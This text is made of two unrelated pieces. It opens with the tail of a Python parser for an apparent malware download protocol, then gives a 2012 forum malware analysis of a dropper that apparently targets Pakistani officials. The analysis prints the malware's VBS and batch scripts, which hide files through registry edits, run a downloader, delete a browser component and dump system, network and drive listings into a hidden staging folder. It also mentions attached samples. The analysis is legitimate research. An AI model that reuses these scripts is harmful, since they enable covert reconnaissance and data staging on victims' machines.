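    """Walk server->client bytes; return ('status', text) and ('file', payload) events."""
    events, pos = [], 0
    while pos + STATUS_LEN <= len(stream):
        status = cstr(stream[pos:pos + STATUS_LEN])
        pos += STATUS_LEN
        events.append(("status", status.decode("ascii", "replace")))
        if status == MARKER:
            continue                      # host already has Clientmgr.exe: no file follows
        if pos + LEN_FIELD > len(stream):
            raise ValueError("truncated length field")
        size = atoi(stream[pos:pos + LEN_FIELD])   # size sent as ASCII, parsed like atoi()
        pos += LEN_FIELD
        if pos + size > len(stream):
            raise ValueError("truncated file payload: expected %d bytes" % size)
        events.append(("file", stream[pos:pos + size]))   # bytes received one at a time
        pos += size
    return events


def _pad(b: bytes, n: int) -> bytes:
    """Zero-pad to the fixed buffer size the binary sends/receives."""
    return b.ljust(n, b"\0")


# Constructed sample traffic (GUID, host name and payload are made up).
SAMPLE_CLIENT_HELLO = _pad(b"{8f1d7b2a-1111-4222-8333-444455556666}WORKSTATION7", ID_LEN)
FAKE_EXE = b"MZ" + bytes(range(30))       # 32-byte stand-in for the Clientmgr.exe bytes
SAMPLE_SERVER_STREAM = (
    _pad(b"new", STATUS_LEN)                           # not "susnata": a file follows
    + _pad(str(len(FAKE_EXE)).encode(), LEN_FIELD)     # "32" in a 10-byte ASCII field
    + FAKE_EXE
    + _pad(MARKER, STATUS_LEN)                         # second status check: infected
)
```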
 #13572  by R136a1
 Thu May 31, 2012 2:36 pm
Game over

The server barneys-versions.net, from which I hoped to get some information, is also down, or more accurately the responding PHP scripts were removed. I am too lazy to analyze the remaining package, in particular the file "download_and_execute.exe" (see below), but the files are attached.
The package is again a WinRAR self-extracting executable with the following files inside:
  • abc.xls
  • Allinone.bat
  • download_and_execute.exe
  • s_wine_flu.bat
  • s_wine_flu.vbs
Execution flow:
s_wine_flu.vbs -> s_wine_flu.bat -> abc.xls + download_and_execute.exe

Files:
s_wine_flu.vbs
Code: Select all
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\Windows\System32\Usermf\userm\s_wine_flu.bat" & Chr(34), 0
Set WshShell = Nothing

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 2, "REG_DWORD"

WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 2, "REG_DWORD"

WScript.Quit
s_wine_flu.bat
Code: Select all
@ echo off
@[HKEY_CLASSES_ROOT\batfile\shell\runas]
@="Run as Administrator" 
@ start "iexplore.exe" "c:\Windows\System32\Usermf\userm\abc.xls"
@ c:\Windows\System32\Usermf\userm\download_and_execute.exe
@ attrib c:\Windows\System32\Usermf\ +s +h
@ attrib c:\recycler +s +h
@ attrib c:\Windows\System32\Usermf\Allinone.bat
del /q "C:\Program Files\Mozilla Firefox\components\storage-mozStorage.js"

systeminfo > c:\Recycler\cache\1Systeminfo.txt

ipconfig /all > c:\Recycler\cache\1ip.txt

@ exit
Allinone.bat
Code: Select all
dir /a /s C:\ > c:\recycler\cache\1C.txt
dir /a /s D:\ > c:\recycler\cache\1D.txt
dir /a /s E:\ > c:\recycler\cache\1E.txt
dir /a /s F:\ > c:\recycler\cache\1F.txt
dir /a /s G:\ > c:\recycler\cache\1G.txt
dir /a /s H:\ > c:\recycler\cache\1H.txt
dir /a /s I:\ > c:\recycler\cache\1I.txt
dir /a /s J:\ > c:\recycler\cache\1J.txt
ipconfig /all > c:\Recycler\cache\1ip.txt
net start > c:\Recycler\Cache\1Services.txt
systeminfo > c:\Recycler\cache\1Systeminfo.txt
net view > c:\recycler\cache\1Netview.txt
pathping google.com > C:\RECYCLER\cache\1Ping.txt
tracert google.com > c:\RECYCLER\cache\1Tracert.txt
route print > c:\RECYCLER\cache\1Route.txt
attrib +s +h C:\Recycler\
abc.xls

Conclusion
The metadata of the MS Office documents indicate that the attackers come from India and the targets were officials (military/politicians/...) from Pakistan. Of course this is just speculation since hard facts are not available.

Thanks goes to Xylitol for providing the sample.
Attachments
PW: infected